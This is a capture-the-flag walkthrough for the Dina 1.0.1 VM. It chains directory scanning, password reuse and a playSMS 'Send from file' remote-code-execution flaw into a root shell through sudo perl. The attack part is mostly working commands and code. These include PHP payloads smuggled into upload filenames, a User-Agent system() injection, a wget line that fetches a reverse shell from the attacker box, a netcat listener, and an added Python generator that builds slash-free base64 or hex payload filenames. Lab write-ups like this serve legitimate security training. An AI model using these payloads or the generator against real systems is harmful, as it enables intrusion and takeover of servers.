- VM: Dina 1.0.1
- Goal: acquire root access
- Approach: solve without automated exploitation tools
First locate the IP address of my target:
nmap -n -sn 192.168.172.200-
nmap -p- -A 192.168.172.234
| Port | Service |
| --- | --- |
| TCP 80 | Apache 2.2.22 (Ubuntu) |
Let’s look at the website.
The nmap scan turned up a few folders. The only one with anything interesting is /nothing/.
There isn't anything on the page itself, but the page source is a different story:
There are some passwords in an HTML comment:
Good start, but we need somewhere to use them, and there are no other pages to check. Let's run a directory scan to see if we can find hidden files or folders.
Directory scan using gobuster
gobuster -u http://192.168.172.234:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp"
It finds a folder /secure
Navigating to /secure shows a backup.zip file, which sounds important.
I download the file and try to extract it with 7z, but it asks for a password. Trying the passwords from the comment, freedom unlocks the archive.
There is only one file inside, backup-cred.mp3, but it is actually a text file, not an mp3. Let's see what's inside.
The file reveals a user name, touhid, and a hidden folder, /SecreTSMSgatwayLogin. Looks like we hit something good. Let's browse to the hidden folder.
It brings us to the login page of playSMS, an open source SMS management application. Trying the username touhid with each password from the list, I get in with diana. That password list proves to be very useful. 🙂
After browsing a few pages to get a general idea of the application, I use searchsploit to look for known vulnerabilities in playSMS.
There is a sendfromfile.php remote code execution exploit available as a Metasploit module. I copy it locally to read it:
searchsploit -m 44599.rb
Based on the exploit description, the Send from file feature lets us upload a file, and if the filename itself is a PHP script, the application executes it. Awesome, that is exactly what we need to get a foothold.
So I use a trivial script that prints the text 'Hello' to test the vulnerability:
touch "<?php print 'Hello' ?>.php"
Now go to My account > Send from file to upload the file
Select the file and click UPLOAD FILE:
Awesome, the page shows Hello instead of the raw PHP tag, which means the code was executed.
Time to get a reverse shell. I tried a few one-line reverse shells (bash, netcat, etc.) but none of them worked, so I decided to use a full PHP reverse shell. Kali already ships one; I make a copy named shell4000.php. You need to edit the file to use your attack machine's IP address and a listening port. In my case the Kali box is 192.168.172.110 and I use port 4000.
cp /usr/share/webshells/php/php-reverse-shell.php shell4000.php
Then update the IP address and port number:
$ip = '192.168.172.110';  // CHANGE THIS
$port = 4000;             // CHANGE THIS
Now we need to upload the reverse shell to the target and execute it, which takes two commands:
wget http://192.168.172.110/shell4000.php -O /tmp/shell4000.php
php -f /tmp/shell4000.php
However, there is a catch: the script has to be the filename, and a Linux filename cannot contain certain characters, most importantly '/', which both commands above use. There are a couple of ways around this limitation:
- Put the command in the User-Agent header instead of the filename:
<?php system($_SERVER['HTTP_USER_AGENT']); ?>.php
Instead of placing the full script in the filename, the filename only tells PHP to execute whatever the HTTP User-Agent header contains. This option requires a proxy such as Burp to set the header on the request that triggers the file.
- Encode the script in the filename and decode it during execution. A simple base64 encoding does the trick.
I am going to use base64 encoding to bypass this limitation.
As seen in the above image, I first obtain the base64 version of each command, then use it in the filename and pipe it through a base64 decode before execution. One thing to watch: the standard base64 alphabet itself contains '/', so check the encoded string before using it as a filename.
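The filename construction above, worked through as an added example (this is not code from the original post or from playSMS). It takes the two commands the post uploads as filenames, base64-encodes them into the same `echo ... | base64 -d | sh` wrapper, and checks that the result is a legal Linux filename, which is the restriction the post ran into. Because the base64 alphabet includes '/', it tries whitespace variants that sh treats identically but that encode differently, and if none is '/'-free it falls back to a hex form decoded by PHP's pack('H*', ...). The hex fallback, the variant search, and the assumption that the target has coreutils base64 and sh are mine, not the post's.

```python
import base64

# The two commands from the walkthrough that have to become playSMS filenames.
# They are the post's own commands; everything else in this block is an added example.
WGET_CMD = "wget http://192.168.172.110/shell4000.php -O /tmp/shell4000.php"
RUN_CMD = "php -f /tmp/shell4000.php"


def is_valid_linux_filename(name: str) -> bool:
    """A Linux path component may not contain '/' or NUL and is at most 255 bytes.
    This models the rule that stopped the post's 'touch "<script>.php"' trick."""
    return "/" not in name and "\0" not in name and 0 < len(name.encode()) <= 255


def b64_filename(cmd: str) -> str:
    """Filename that makes the target decode and run cmd.
    Assumes coreutils base64 and sh exist on the target (the post's own pipe implies this)."""
    enc = base64.b64encode(cmd.encode()).decode()
    return f"<?php system('echo {enc} | base64 -d | sh') ?>.php"


def hex_filename(cmd: str) -> str:
    """Fallback that can never contain '/': PHP's pack('H*', ...) turns hex back into bytes.
    This fallback is my addition, not something the original post used."""
    return f"<?php system(pack('H*', '{cmd.encode().hex()}')) ?>.php"


def equivalent_commands(cmd: str):
    """Yield forms of cmd that sh executes identically but that base64-encode differently.

    0-2 leading spaces shift the 3-byte alignment of the whole string; widening one
    inter-token gap shifts the alignment of everything after it. Either can move a
    '/' out of the encoded output.
    """
    tokens = cmd.split(" ")
    for lead in range(3):
        yield " " * lead + cmd
        for i in range(1, len(tokens)):
            yield " " * lead + " ".join(tokens[:i]) + "  " + " ".join(tokens[i:])


def build_filename(cmd: str) -> str:
    """Return the first '/'-free base64 form; fall back to hex if no variant works."""
    for variant in equivalent_commands(cmd):
        name = b64_filename(variant)
        if is_valid_linux_filename(name):
            return name
    return hex_filename(cmd)


def decode_filename(name: str) -> str:
    """Recover the command a generated filename runs, i.e. what the target will decode."""
    if " | base64 -d" in name:
        start = name.index("echo ") + len("echo ")
        return base64.b64decode(name[start:name.index(" | base64 -d")]).decode()
    start = name.index("pack('H*', '") + len("pack('H*', '")
    return bytes.fromhex(name[start:name.index("'))")]).decode()


def same_command(a: str, b: str) -> bool:
    """Compare two commands ignoring the extra whitespace the variants add."""
    return " ".join(a.split()) == " ".join(b.split())


if __name__ == "__main__":
    # Print the two filenames to create with touch and upload via Send from file.
    for cmd in (WGET_CMD, RUN_CMD):
        name = build_filename(cmd)
        assert is_valid_linux_filename(name)
        assert same_command(decode_filename(name), cmd)
        print(name)
```

Each printed name can be passed to touch exactly as the post does with the Hello test file. The base64 form is preferred because it is what the post used; the hex form is only there so the generator never silently hands you a filename that touch will reject. Whether playSMS itself imposes further filename rules is not something the post says, so only the Linux rule is checked here.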
Good, the two files are ready. Now set up a web server on the attack box to serve the shell file:
python -m SimpleHTTPServer 80
Next, set up netcat to listen on port 4000:
nc -nvlp 4000
Now use the Send from file feature to upload the two files, one after the other, and wait for the shell.
After uploading the first file, our web server logs a request for shell4000.php. Good.
After uploading the second file, we get a low-privilege shell.
The very first command I run after getting a shell is sudo -l. If the user has any sudo rights, that is the easiest way to get root.
Yup, the user is allowed to run perl as root. Since perl can spawn other programs, that means we can execute commands as root: all we need is to use perl to start a bash shell, which then runs as root.
Root shell obtained. All right!